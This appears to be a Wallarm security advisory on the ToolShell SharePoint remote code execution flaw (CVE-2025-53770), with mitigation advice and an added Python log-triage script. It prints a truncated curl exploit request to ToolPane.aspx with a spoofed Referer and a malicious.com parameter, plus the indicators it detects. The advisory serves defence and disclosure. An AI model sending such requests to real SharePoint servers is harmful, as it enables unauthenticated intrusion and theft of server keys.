ToolShell: Remote Code Execution in Microsoft SharePoint (CVE-2025-53770)

Security Update News

Update Information

Title: ToolShell: Remote Code Execution in Microsoft SharePoint (CVE-2025-53770)
Update ID: WALLARMLAB:404FAFD231E5C37C2580D301BEEEFE3B
Type: wallarmlab
Published: 2025-07-25T14:17:00
Last Updated: 2025-07-25T14:17:00

Security Impact

CVSS Score: 9.8
Severity: CRITICAL

Affected CVEs

  • CVE-2025-49704
  • CVE-2025-49706
  • CVE-2025-53770

Update Details

On July 19, 2025, a critical remote code execution (RCE) vulnerability (CVE-2025-53770, also referred to as ToolShell) was publicly disclosed, impacting on-premises Microsoft SharePoint Server installations. This vulnerability allows unauthenticated attackers to execute arbitrary code remotely by leveraging insecure deserialization techniques. Given the platform’s widespread use and exposure to the internet, the potential for compromise is substantial and growing, especially with confirmed active exploitation in the wild.

## **Vulnerability Overview**

CVE-2025-53770 targets Microsoft SharePoint via a flaw in **ViewState deserialization**, specifically triggered at the endpoint:

`/_layouts/15/ToolPane.aspx`

By abusing the **Referer header** (pointing to `/_layouts/SignOut.aspx`) and uploading a crafted .aspx file (e.g., spinstall0.aspx), attackers can bypass authentication and execute remote payloads. Once executed, these payloads can extract **ASP.NET machine keys** (`ValidationKey` and `DecryptionKey`) from the server, enabling the creation of malicious `ViewState` data that the server will accept as legitimate.

This vulnerability falls under “OWASP A08:2021 – Software and Data Integrity Failures,” specifically due to its insecure deserialization. The attack chain may also involve two auxiliary vulnerabilities: CVE-2025-49706 and CVE-2025-49704, which exacerbate the impact.

CVE-2025-53770 is classified as a critical pre-authentication remote code execution vulnerability, with an estimated CVSS score of 9.8, reflecting its ease of exploitation, lack of required privileges, and severe potential impact.

## **Exploitation in the Wild**

### **Exploit Mechanics**

The root cause lies in **insecure deserialization** via ViewState, specifically the injection of a malicious control such as:

``

This payload, when deserialized by SharePoint, leads to arbitrary code execution if the attacker already possesses machine keys. Below is a truncated exploit example via curl:

`curl -sk -X POST 'https://victim.com/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx' -H 'Referer: /_layouts/SignOut.aspx' -H 'Content-Type: application/x-www-form-urlencoded' --data-urlencode 'MSOTlPn_Uri=https://malicious.com' --data-urlencode 'MSOTlPn_DWP='`

## **Wallarm Response and Observed Exploitation**

Wallarm deployed detection rules shortly after disclosure to identify and block exploitation attempts of CVE-2025-53770. Within hours, Wallarm customers were protected. The rules detect crafted ViewState payloads and abnormal access to the vulnerable endpoint.

![A screenshot from the Wallarm interface showing a detected attack.](https://i0.wp.com/lab.wallarm.com/wp-content/uploads/2025/07/first-image.png?resize=770%2C321&ssl=1)

Wallarm detected immediate spikes in exploit attempts following the public disclosure:

![A line graph showing the increase in attacks detected by Wallarm starting July 20 and peaking on July 22](https://i0.wp.com/lab.wallarm.com/wp-content/uploads/2025/07/second-image.png?resize=770%2C473&ssl=1)

These figures show rapid adoption of the exploit code by threat actors. Public repositories on GitHub have already published working proof-of-concept payloads, lowering the bar for exploitation even further.

## Mitigation

Wallarm recommends clients:

* Patch affected SharePoint servers immediately
* Rotate ASP.NET cryptographic keys
* Inspect systems for indicators of compromise
* Isolate public-facing SharePoint instances if unpatched
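The detection rules described above (abnormal access to the vulnerable endpoint) and the "inspect systems for indicators of compromise" step both come down to the same log triage: look for the request shape this post describes (a POST to `/_layouts/15/ToolPane.aspx` with `DisplayMode=Edit` and a Referer of `/_layouts/SignOut.aspx`) and for requests to the dropped `.aspx` file name (`spinstall0.aspx`). The script below is an added example, not Wallarm's rule set or any tool from the post; it parses IIS W3C-format log lines using the `#Fields:` header, flags the two patterns, and returns the client addresses behind high-confidence hits. The log lines are constructed for illustration, the field layout is the one IIS emits by default, and the third rule (an anonymous `DisplayMode=Edit` POST without the SignOut Referer) is an assumption about what a lower-confidence variant would look like, not an indicator from the post.

```python
"""Triage IIS W3C logs for the ToolShell (CVE-2025-53770) request pattern.

Added example for illustration; not code from the original post. Indicators
used: the ToolPane.aspx endpoint, DisplayMode=Edit, the SignOut.aspx Referer and
the spinstall0.aspx file name, all as named in the post above.
"""
import posixpath
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Set, Tuple
from urllib.parse import parse_qs

TOOLPANE_STEM = "/_layouts/15/toolpane.aspx"   # compared lower-cased
SIGNOUT_REFERER = "/_layouts/signout.aspx"      # compared lower-cased
WEBSHELL_NAMES = {"spinstall0.aspx"}            # file name from the post; extend with your own IoCs

# Constructed sample log (NOT real traffic) in IIS W3C layout; spaces inside a
# field are written as '+' by IIS, so splitting on whitespace is safe.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-20 03:12:44 10.0.0.5 GET /SitePages/Home.aspx - 443 DOMAIN\\alice 10.0.0.21 Mozilla/5.0 https://sp.example.test/ 200
2025-07-20 03:15:02 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 python-requests/2.31 /_layouts/SignOut.aspx 200
2025-07-20 03:15:09 10.0.0.5 GET /_layouts/15/spinstall0.aspx - 443 - 203.0.113.7 python-requests/2.31 - 200
2025-07-20 03:16:30 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 DOMAIN\\bob 10.0.0.33 Mozilla/5.0 https://sp.example.test/_layouts/15/start.aspx 200
"""


@dataclass(frozen=True)
class Finding:
    line_no: int
    client_ip: str
    rule: str
    confidence: str


def parse_w3c(text: str) -> Iterator[Tuple[int, Dict[str, str]]]:
    """Yield (line_no, record) per data line, mapping columns via the #Fields header."""
    fields: List[str] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]        # header can change mid-file; re-read it
            continue
        if not raw or raw.startswith("#"):
            continue                        # other directives (#Software, #Date, ...)
        values = raw.split()
        if not fields or len(values) != len(fields):
            continue                        # malformed line: skip rather than guess alignment
        yield line_no, dict(zip(fields, values))


def classify(rec: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (rule, confidence) for a record, or None if nothing matches."""
    stem = rec.get("cs-uri-stem", "").lower()
    method = rec.get("cs-method", "").upper()
    query = parse_qs(rec.get("cs-uri-query", ""))   # "-" (no query) parses to {}
    referer = rec.get("cs(Referer)", "").lower()
    user = rec.get("cs-username", "-")

    # Any request for the dropped .aspx file is a strong post-exploitation indicator.
    if posixpath.basename(stem) in WEBSHELL_NAMES:
        return "webshell-access", "high"

    display_modes = [v.lower() for v in query.get("DisplayMode", [])]
    if method == "POST" and stem.endswith(TOOLPANE_STEM) and "edit" in display_modes:
        if SIGNOUT_REFERER in referer:
            return "toolshell-request", "high"       # the exact shape described in the post
        if user == "-":
            return "toolpane-anonymous-edit", "medium"  # assumption: anonymous edit POST without SignOut Referer
    return None


def triage(text: str) -> List[Finding]:
    """Run classify() over every record and collect the hits."""
    findings: List[Finding] = []
    for line_no, rec in parse_w3c(text):
        hit = classify(rec)
        if hit is not None:
            findings.append(Finding(line_no, rec.get("c-ip", "?"), hit[0], hit[1]))
    return findings


def suspicious_ips(findings: List[Finding]) -> Set[str]:
    """Client addresses behind high-confidence findings, for blocking or pivoting."""
    return {f.client_ip for f in findings if f.confidence == "high"}


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.rule} ({f.confidence}) from {f.client_ip}")
    print("high-confidence sources:", sorted(suspicious_ips(SAMPLE_LOG and triage(SAMPLE_LOG))))
```

On the sample, the authenticated edit POST on the last line is deliberately left unflagged: a legitimate editor hitting ToolPane.aspx from a normal page is routine, and the distinguishing features in this post are the SignOut Referer and the absence of a session. Point `triage()` at real `u_ex*.log` contents to run it against a server, and note that `DisplayMode` is matched case-sensitively as a query key, matching how the post shows it.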

This layered defense ensures both proactive mitigation and forensic readiness.

## **Conclusion**

CVE-2025-53770 is an example of the critical risks posed by pre-authentication RCE vulnerabilities in widely exposed platforms like Microsoft SharePoint. While patching and key rotation are essential, they alone are not sufficient to defend against rapidly evolving threats.

A Web Application and API Protection (WAAP) solution is vital to a multilayered security strategy, providing virtual patching, real-time threat detection, and attack surface protection, especially during the high-risk period between disclosure and remediation. Wallarm’s rapid response to this vulnerability illustrates how WAAP can effectively close the gap, blocking exploit attempts before they impact critical systems.

### **Risk Summary**

* Pre-auth RCE with high reliability
* Targets a widely-used enterprise collaboration platform
* Potential for data theft, lateral movement, and persistence

### **Public Exposure: Shodan Insights**

As of publication, **Shodan search results** show **16,405 internet-facing SharePoint instances**, many of which are likely vulnerable. This highlights the scale of exposure and the urgency of remediating public deployments.

![A screenshot from Shodan showing the number of detected instances of Sharepoint.](https://i0.wp.com/lab.wallarm.com/wp-content/uploads/2025/07/third-image.png?resize=487%2C768&ssl=1)

## **References**

* NVD NIST: CVE-2025-53770
* Vendor Advisory: Microsoft Guidance
* https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770
* Security Research: GitHub Exploit Repository
* Exploit Payload: Example Payload

The post ToolShell: Remote Code Execution in Microsoft SharePoint (CVE-2025-53770) appeared first on Wallarm.
